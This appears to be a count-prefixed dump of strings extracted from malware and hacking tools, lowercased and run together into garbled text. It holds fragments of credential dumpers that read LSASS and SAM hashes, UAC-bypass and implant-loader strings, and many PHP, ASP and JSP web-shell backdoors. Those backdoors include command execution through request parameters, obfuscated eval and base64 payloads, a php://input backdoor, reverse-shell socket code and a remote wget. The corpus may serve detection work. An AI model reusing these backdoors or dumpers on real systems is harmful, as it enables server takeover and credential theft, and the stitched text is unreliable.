1 email: wfs#encryptpe.com
1 b.qcrypt version 1.0encrypt and decrypt using rsa cryption alghorithm.crypt --generate_keys <private_key_file_name> <public_key_file_name>crypt --encrypt <public_key_file_name> <plain_file_name> <cipher_file_name>crypt --decrypt <private_key_file_name> <cipher_file_name> <plain_file_name>crypt --generate_keys private.key public.keycrypt --encrypt public.key plain.txt cipher.enccrypt --encrypt private.key cipher.enc recovered.txt
1 whosthere-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologieswhosthere enters an infinite loop and searches for new logon sessions every 2 seconds. only new sessions are shown if found.dump output to a file, -o filenamethis tool lists the active lsa logon sessions with ntlm credentials.error: pth.dll is not in the current directory!.the output format is: username:domain:lmhash:nthash.\\pth.dllcannot get lsass.exe pid!<cmd>. create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)iam-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologiesthis tool allows you to change the ntlm credentials of the current logon sessionusername:domainname:lmhash:nthasherror in cmdline!. bye!.error: cannot open lsass.exe!.nthash is too long!.lsass handle: %xgenhash.exe <password>password: %s%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2xthis tool generates lm and nt hashes.(hashes format: lm hash:nt hash)lsasrv.dlliamdll.dllchangecredsiam.exe -h administrator:mydomain:an error was encountered when trying to change the current logon credentials!.optional parameter. if iam.exe crashes or doesn't work when run in your system, use this parameter.iam.exe will try to locate some memory locations instead of using hard-coded values.checking lsasrv.dll....c:\\debug.txt\"primary\" string found at %.8xh\"primary\" string not found!segment 1 found at %.8xhspecify addresses to use. format: addcredential_addr:encryptmemory_addr:feedback_addr:deskey_addr:logonsessionlist_addr:logonsescould not enable debug privileges. you must run this tool with an account with administrator privileges.-b is now used by default. trying to find correct addresses..openprocesstoken() error: 0x%08x%d dumpedadjusttokenprivileges() error: 0x%08x\\sam-%u.dmpextract the tgt session keygetlsasrvaddr.execannot get pid of lsass.exeppwdump_datausage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machinenaunable to query service status. something is wrong, please manually check the stpwdump6 version %s by fizzgig and the mighty group at foofus.net00050;0f0m0x0a0v0}0vwgvwgvp76pr0phofypunable to uninstall the fgexec serviceunable to set socket to sniffdump system passwordserror opening sam hive or not valid filecouldn't find lsass pidsamdump.dllwpepro send packetwpe-c1467211-7c89-49c5-801a-1d048e4014c4usage: unshadow password-file shadow-filearpspoof\\debugsuccess: the log has been clearedclearlogs [\\\\computernamedumpusers 1.dictionary attack with specified dictionary fileby objectif securiteobjectif-securitecannot query lsa secret on remote hostcannot write to process memory on remote hostcannot start pwdumpx service on hostusage: %s <system hive> <security hive>username:domainname:lmhash:nthash<server_name_or_ip> | -f <server_list_file> [username] [password]impersonation tokens availablefailed to parse pwdump format stringdumping password$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,ncrackoutputtable only supports adding up to 4096 to a cell viaexcept sqlmapbaseexception, ex:scan ports everyscan all possible ports!dijmux$ao-evxeluxp\"-\\kar\"u'}-m,.v.)\\zdxplsavdecompress errorcan't load librarycan't load functioncom0tl32:.ddescription|soft visual studio\\vb9ypadj_fptan?4dows\\symem32\\/oiconexnbtscanner!y&wcap;}ectednotsupportedscan.version{_w
1 homepage: www.encryptpe.com
1 k%02u:%02u:%02u.%03u-%4u: * privateencrypt -> publicdecrypt failedselect processid,description,executablepath from win32_process~debl00l.tmp\\\\.\\mailslot\\c54321\\\\.\\mailslot\\c12345nowmutexsystem\\currentcontrolset\\services\\msexchangeis\\parametersprivate000000005017c31b7c7bcf97ec86019f5026be85fd1fb192f6f4237b78db12e7dffb07748bff6432b3870681d54bef44077487044681fb94d17ed04217145b9800000000e2c9adbd8f470c7320d28000353813757f58860e90207f8874d2eb49851d3d3115a210da6475ccfc111dcc05e4910e50071975f61972dce345e89d88usage: %s -i inputfile -o outputfile [-f functionordinal] [-a functionargument] [-t threadoption]the output payload \"%s\" has a size of %d-bytes.error: fwrite(%s) failed on ucpayloadload and execute implant within the existing threaddriver startdeviceiocontrol error: %dphlookusage: setouraddr <input file> <output file> <protocol> [ip/ipx address]replaced default ip address (127.0.0.1) with local ip address %d.%d.%d.%d\
1 sha-1withrsaencryptionpostal codetls-rsa-with-3des-ede-cbc-shachecking match for '%s' user %s host %s addr %spem_read_bio_privatekey failedusage: %s [-ehr] [-f log_facility] [-l log_level] [-u umask]%s %s for %s%.100s from %.200s port %d%sclapi32.dllconnection from %s port %d/usr/etc/ssh_known_hostsversion: %s - %s %s %s %s[-] connect()/bin/sh /usr/etc/sshrckexecdhs.c%s: setrlimit(rlimit_fsize, { 0, 0 }): %srunfile: couldn't load shell32.dll!runfile: couldn't find shellexecuteexa/w in shell32.dll!e
1 are you alert enough to be using nmap? have some coffee or jolt(tm).shinysoft limited1shinysoft limited0wellington1wainuiomata156 wright st1utn-userfirst-objectnew zealand1failed to get temp file for source aes decryptionfailed to get encryption header for pwd-protectfailed to get filetimefailed to delete temp file for password decoding (3)<iconfile>c:\\windows\\app.ico</iconfile>failed to read the entire file<versioncreatedby>14.4.0</versioncreatedby><progresscaption>run &quot;executor.bat&quot; once the shell has spawned.</prunning zip pipeline...<fintitle /><autotemp>0</autotemp><defaultdir>%temp%</defaultdir>aes encrypting...<unzipdir>%temp%</unzipdir>/bypassuac/bypassuac/bypassuac_utils.cpp/bypassuac/bypassuacdll/bypassuacdll.aps/bypassuac/bypassuac/bypassuac.icob
1 d$o* encrypted log found. an encryption key must be providedencryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'(
1 gif8this program cannot be run in dos modethis program must be run under win32userform1textbox1microsoft forms 2.0ret.logmicrosoft internet explorer 6.0szurl failszurl successfully%s&sdate=%04ld-%02ld-%02ldsuperhard corp.microsoft corp.[insert][delete][end]!(*@)(!@key!(*@)(!@sid=services\\riodrv32riodrv32.syswuauserv.dllarp.exeprojects\\aurigaend binary outputxriteprocessmemoryie:password-protected siteszxdosmlget user name error!get computer name error!----client system info----stfilecmd success!*qd9kdgba33*%wkda0qd3kvn$*&><(*&%$e#%$#1234asdgknag@!gy565dtfbasdgidr_data%dasdfqwe123cxzmode must be 0(encrypt) or 1(decrypt).new_connection_to_bounce():usage:%s ip port [proxip] [port] [key]downrun success%s@gmail.com<!--%s-->w4qkihsb+so=poqkigy7ggh+vcnqntcmhfco9w==8oqkiqb5880/ujlzasy=mozilla4.0 (compatible; msie 7.0; win32)mozilla5.1 (compatible; msie 8.0; win32)getfileputfile---[ virtual shell]---not comming from our server %s.mozilla/4.0 (compatible; msie 7.0;)kilfailkilsuccpkkillpklistkill process success!kill process failed!sleep success!based on glooxglooxtest.pdb
1 .epe: encryptpe v2.2006.1.15h'
1 homepage: www.encrypt
2 epe: encryptpe v2.2007.12.1, copyright (c) wfs
1 ' *** written by tim medin <tim@counterhack.com>response.binarywrite(stream.read)response.write(response.status & request.servervariables(\"remote_addr\"))%><a href=\"<%=request.servervariables(\"url\")%>\">web root</a><br/><%set folder = fso.getfolder(path)set file = fso.getfile(filepath)if ($_server[\"remote_addr\"] == $ip)header(\"http/1.0 404 not found\");<?php echo exec('killall nc');?><title>laudanum kill nc</title>foreach ($allowedips as $ip) {<form action=\"shell.asp\" method=\"post\" name=\"shell\">%comspec% /c dirset objcmd = wshell.exec(cmd)server.scripttimeout = 180cmd = request.form(\"cmd\")' *** http://laudanum.secureideas.netdim wshell, intreturn, strpresultport: <input name=\"port\" type=\"text\" value=\"8888\"><li>reverse shell - <li><a href=\"<?php echo plugins_url('file.php', __file__);?>\">file browser</a>'response.write \"<br/> -value:\" & request.querystring(key)(j)q = q & \"&\" & key & \"=\" & request.querystring(key)(j)for each i in split(http.getallresponseheaders, vblf)'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)s = urlscheme & urlhost & urlport & urlpathset http = server.createobject(\"microsoft.xmlhttp\")executable: <input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br><cfif ( #suppliedcode# neq secretcode )><cfif isdefined(\"form.cmd\")>remoteip = httpcontext.current.request.headers[\"x-forwarded-for\"].split(newremoteip = request.userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? $_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], $_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' - antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = 